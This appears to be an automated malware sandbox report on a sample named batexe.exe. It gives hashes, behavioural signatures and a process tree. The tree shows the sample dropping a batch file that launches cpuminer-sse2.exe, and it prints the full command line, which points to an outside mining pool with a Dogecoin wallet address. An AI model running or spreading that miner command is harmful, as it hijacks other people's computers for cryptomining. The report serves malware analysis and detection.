Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
291s -
max time network
305s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
20/02/2024, 12:35
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation b2e.exe Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation batexe.exe -
Executes dropped EXE 2 IoCs
pid Process 2328 b2e.exe 3116 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 3116 cpuminer-sse2.exe 3116 cpuminer-sse2.exe 3116 cpuminer-sse2.exe 3116 cpuminer-sse2.exe 3116 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/4192-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4192 wrote to memory of 2328 4192 batexe.exe 85 PID 4192 wrote to memory of 2328 4192 batexe.exe 85 PID 4192 wrote to memory of 2328 4192 batexe.exe 85 PID 2328 wrote to memory of 3620 2328 b2e.exe 86 PID 2328 wrote to memory of 3620 2328 b2e.exe 86 PID 2328 wrote to memory of 3620 2328 b2e.exe 86 PID 3620 wrote to memory of 3116 3620 cmd.exe 89 PID 3620 wrote to memory of 3116 3620 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Users\Admin\AppData\Local\Temp\3294.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\3294.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\3294.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\41D6.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3116
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.2MB
MD508a59d5a03e9c0405f0f56631750fc0f
SHA1877a28d508a3f4ecdfad08dbb47f63bf78221640
SHA256facc153a58caf41769b7b137a814f61a5170fec923086aafeeb6ffe945a221c1
SHA5124b0167d68166460ed13c0e521a1ea4f8a43c0695088a3d73a250de5507b713094a882f694dcf09a1c0ded7a7150c9f0e2f42871da5fca4ec180ef3d6b115191b
-
Filesize
3.6MB
MD5a202c43df284047b4026052f2015b382
SHA1531129cc3cff7410080574b0fd1f8404c8c343d6
SHA25622e0189ee48633fcbb780d8ce081c027adcfd289ce6b90e0dddf506b78a59a66
SHA51203192f196ccd2100255c1fad56bd14019876f87509f7215f1af469e93a9e4a8686d7bd18a1273d46e05711d1017a87948b4299a6d4597fa66001b29ee310cea2
-
Filesize
2.6MB
MD5f845d6b8c0beb43591f7ebc96344f81b
SHA15bcb9d96f6589b559060e11d6d5a0bf73d91c80e
SHA256841b8431f27f5e631d37c605530e6ce5430559c96fa9a6ddebc7e9dd63ad04b2
SHA5128de293211ad14117c9ecb797c78c738c91b691f3dc861401d537cc72c9ba05a40340c452938bd6d72bf400efa1fffb7bb387f204035697b8a229a29288d5d357
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
256KB
MD5e0c023f2dc80d8f2415830dcaf9b9e45
SHA19806d1f4bd0f76e044071f95f9210b09c2c09fd0
SHA256dc7de4210ed002ed6ab8340d21f999fd77ff9c1fe4361227ebbe3324b24009a0
SHA51276d594de32b07899a478e6b1fbe4a158492174439df3a65478b21135aea9695f47cd6b5006d1bb28398fb1b1f0e64f33e839ae16225fe755bcec4d25d3caf0ef
-
Filesize
483KB
MD54bda65094b0ceca12a7381dd0089e944
SHA1f212146f99130be5f33c5f565509a6ea18d03419
SHA25686d1e9ec40a003b8d11cb92017b764822c7aa7dcf8736470680454ab19731e07
SHA512fd65caf1cd9bcb5cb4cdae9f0a8038f5e76a059933a7c0673807b56619cddce71bc0d8b351809b865a062d9273a2cd5ac5ea6b59ea0b6a0c2176d66e7302480f
-
Filesize
542KB
MD577c67b724490b39dc04456f159604dfd
SHA1e4c774925139cffad702dbcacdebb9fc1f18aab7
SHA2566fde97021627e1103a4627d0a9bb42f923d9afe14975879dbfeb75aea203429a
SHA512ee994a158f3ecb50861f7f075ff829b1e6655a9f30cda5a9885e77dd819fc52237e0a396986dfa9c9edc490f8c83f2c8d649282d70df81d505f0301fab097639
-
Filesize
608KB
MD52c51b71191ef67182198611d281a70dc
SHA1772c59964c73a13f5ab57cb687e353c846383a1d
SHA256b627f16b23d7f2297b0496c76a1a237892868431e3075a8af8ab5633fb9651d9
SHA512b107d3a8047f5a927f7f25755b021b5899d3eeb8749b1e6f172b5c1ebd020d1d06625293bd8a578a4570260710f6f5439aa59e30817a1cfec55de8cffbd0e714
-
Filesize
410KB
MD5910e1adba3bc2948bba2e70755e20fd7
SHA1b8c13e9419f174c31a5b8d52099a00d09167eda3
SHA256b9c9a00e9679afaea3298a71152a92eed69f35e9a9372925c3620b6e3c8061ab
SHA5128cea477cf48c46460112944845196d7a8012b53bf9528dbdd95a87e68741aa3a3d27fd99fed63294f74b624d8e49740f1a8ae4f95665f9d154abea1c66b6149c
-
Filesize
337KB
MD59e54b81dd1ba809523c9cdc0a5e291fd
SHA1362b21649778dbf786d17e4187eafc9f6bef4b00
SHA2562a5b19a37f43347a16537bb93162287a604d47dcc234a8f98c1fbacb4e21e923
SHA512b231165c6bead0684f93f1d89dbcb1194aa8b6e6126f8a2f8d11eebc89fa88d6b2ba800e57ffd3e0270cc98bc66e442e6ec72977d13d50ac86f465c3b31e6e77
-
Filesize
708KB
MD5f27fbbbe24695182c4d69706254cc7eb
SHA148bb33dca68b8364d1c417d9b904faa941dd0e7f
SHA256bd915d560a73f56176c78a74053c5070b0df145e17ff87df43ccbc9c37ab594e
SHA512c1d076114d51427a8e4cc348fa952d45a67e88d6af78478c6db2b6a7f47ff590510f802c465a4aaaa4d45f55681f209d1fb1402aa494537dff4dc25f72ec3089
-
Filesize
658KB
MD59f8021c7bd1271364f5cfcda9b23f190
SHA174642bba26a9f9b541995f07ec36337947fde710
SHA256fb0747b476e414325562062e3784c38721172f82b5f2960ceba3b260f654845c
SHA512e83b2fb6a4735b2e7bfc1486e36c7e3587e19fb10194b7b655457d6c29f5a2abc49ae2f28ec7e7912a33c87a456f1ed9df648f58b7edfaf61f3100ffb5779402
-
Filesize
482KB
MD5590edc3cacd407682c2bbcc3b29ac1a8
SHA1a77d02e99cde8c262250e803dd487a08730c2fa8
SHA256b1d04f44e145f2330dc74188ddb6c8df1ae2ac0775e870be48edd62a76f1e5c5
SHA5123589811bb0ebaa2aa908e9160fd58b883b8ea9c57249837c6700db21398a7f4837791ec68fe4b3b1aa5407d915c0ef98fff37a32227ac72b30421cafd2bc85c4
-
Filesize
549KB
MD5e939d0497478d5445031572565c216a5
SHA10e657da5462ac7100842eb7c03c2a0bfa46781c1
SHA2561c2007f881eea599b66bd81816210d50bdfbea9b8100d669396d0f0c83c3b854
SHA5120ded826afa8b9f92d7bb622d3eaca8a1eab56ccc63703dde5745176cf79083ff753180d455ca1856d22377a25b14092da2c5c365da3caadb7a510bdef7813c9b
-
Filesize
501KB
MD55dc8a2e305b57be21547ec3f33ab848c
SHA1ed01cfc3214b4df7a5f5a87a5d3bf484aa2b21b2
SHA256f446b84abd2fbe3d50140fa2e8284742922218d354cffb2ed9d17648cf358a09
SHA512b3a6908cc2dab6b2998cc1b6b28a95f9c34ada39eca83589c318e8d78e738a1f54aafef357ae42ff1a26de3dee99fbe7162f12251eb214da697cc544f0092c07